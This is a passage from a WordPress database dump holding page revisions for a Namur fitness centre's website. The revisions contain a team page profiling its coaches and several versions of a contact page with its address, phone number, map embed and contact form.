src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:600px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-31', '', '', '2013-07-03 19:55:18', '2013-07-03 19:55:18', '', 20, 'http://www.crosstrainingcenter.be/?p=253', 0, 'revision', '', 0),
(255, 1, '2013-07-03 19:56:59', '2013-07-03 19:56:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:290px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-33', '', '', '2013-07-03 19:56:59', '2013-07-03 19:56:59', '', 20, 'http://www.crosstrainingcenter.be/?p=255', 0, 'revision', '', 0),
(254, 1, '2013-07-03 19:55:48', '2013-07-03 19:55:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height:280px\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-32', '', '', '2013-07-03 19:55:48', '2013-07-03 19:55:48', '', 20, 'http://www.crosstrainingcenter.be/?p=254', 0, 'revision', '', 0),
(258, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n&nbsp;\r\n<iframe width=\"425\" height=\"350\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 9, 'http://www.crosstrainingcenter.be/?p=258', 0, 'revision', '', 0),
(259, 1, '2013-07-03 20:26:03', '2013-07-03 20:26:03', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nChaussée de Perwez 251\r\n5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small>\r\n\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:26:03', '2013-07-03 20:26:03', '', 9, 'http://www.crosstrainingcenter.be/?p=259', 0, 'revision', '', 0),
(260, 1, '2013-07-03 20:28:57', '2013-07-03 20:28:57', '<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small>\r\n\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:28:57', '2013-07-03 20:28:57', '', 9, 'http://www.crosstrainingcenter.be/?p=260', 0, 'revision', '', 0),
(261, 1, '2013-07-03 20:31:53', '2013-07-03 20:31:53', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n</td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;output=embed\" height=\"350\" width=\"425\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"http://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;sll=50.483687,4.854333&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;ll=50.483687,4.854333&amp;spn=0.046423,0.112867&amp;t=m&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:31:53', '2013-07-03 20:31:53', '', 9, 'http://www.crosstrainingcenter.be/?p=261', 0, 'revision', '', 0),
(262, 1, '2013-07-03 20:33:29', '2013-07-03 20:33:29', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\nPrise de RDV par téléphone : 0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em>\r\n</td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe width=\"300\" height=\"300\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\"></iframe><br /><small><a href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:33:29', '2013-07-03 20:33:29', '', 9, 'http://www.crosstrainingcenter.be/?p=262', 0, 'revision', '', 0),
(263, 1, '2013-07-03 20:36:24', '2013-07-03 20:36:24', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Prise de RDV :</h1>\r\n0485 / 92 . 02 . 12\r\n\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td>\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:36:24', '2013-07-03 20:36:24', '', 9, 'http://www.crosstrainingcenter.be/?p=263', 0, 'revision', '', 0),
